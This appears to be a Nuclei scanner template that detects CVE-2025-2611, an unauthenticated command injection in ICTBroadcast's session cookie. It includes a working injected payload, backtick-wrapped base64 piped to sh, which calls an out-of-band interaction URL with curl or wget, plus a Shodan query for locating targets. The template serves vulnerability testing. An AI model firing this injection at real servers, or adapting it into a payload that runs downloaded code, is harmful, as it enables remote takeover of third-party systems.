id: CVE-2025-2611 info: name: ICTBroadcast - Command Injection author: Chocapikk severity: critical description: | The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling. Versions 7.4 and below are known to be vulnerable. impact: | Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full server compromise. remediation: | Update to a version later than 7.4 or the latest available version. reference: - https://www.vulncheck.com/blog/ictbroadcast-kev - https://nvd.nist.gov/vuln/detail/CVE-2025-2611 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-2611 epss-score: 0.77727 epss-percentile: 0.99021 cwe-id: CWE-78 metadata: verified: true max-request: 2 shodan-query: html:"ICTBroadcast" tags: cve,cve2025,rce,ictbroadcast,oast,oob,vkev flow: http(1) && http(2) http: - raw: - | GET /login.php HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: header words: - "Set-Cookie:" internal: true extractors: - type: regex name: cookie_name part: header group: 1 regex: - '(?mi)^Set-Cookie:\s*([A-Za-z0-9_-]+)=' internal: true - raw: - | GET /login.php HTTP/1.1 Host: {{Hostname}} Cookie: {{cookie_name}}={{cookie_payload}} disable-cookie: true payloads: cookie_payload: - "`echo${IFS}{{base64('curl -s {{interactsh-url}} || wget -qO- {{interactsh-url}}')}}|base64${IFS}-d|sh`" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "ICTBroadcast")' - 'contains(interactsh_protocol, "dns")' condition: and # digest: 4a0a004730450220384029c7ca79a3579da561ccc5cb3f8f3c0c47b17aa94e86213a648dd76ea40d022100b020fe13e67461034020fc9b2d9a2836516216d7d8ff1692fc41c7526217e0b1:922c64590222798bb761d5b6d8e72950